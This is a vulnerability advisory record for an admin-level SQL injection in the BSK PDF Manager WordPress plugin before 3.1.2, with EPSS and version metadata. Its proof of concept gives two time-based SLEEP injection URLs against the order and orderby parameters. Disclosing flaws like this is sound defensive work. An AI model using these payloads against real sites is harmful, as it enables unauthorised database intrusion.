Lucene search

K
wpvulndbJrXnmWPVDB-ID:D5891973-37D0-48CB-A5A3-A26C771B3369
HistoryNov 01, 2021 - 12:00 a.m.

BSK PDF Manager < 3.1.2 - Admin+ SQL Injection

2021-11-0100:00:00
JrXnm
wpscan.com
7

0.001 Low

EPSS

Percentile

37.7%

The plugin does not validate and escape the orderby and order parameters before using them in a SQL statement, leading to a SQL injection issue

PoC

With at least one BSK PDF Category: https://example.com/wp-admin/admin.php?page=bsk-pdf-manager&amp;order;=and+sleep(5) https://example.com/wp-admin/admin.php?page=bsk-pdf-manager&amp;orderby;=last_date`+AND+SLEEP(5)+OR+`last_date

CPENameOperatorVersion
bsk-pdf-managerlt3.1.2

0.001 Low

EPSS

Percentile

37.7%

Related for WPVDB-ID:D5891973-37D0-48CB-A5A3-A26C771B3369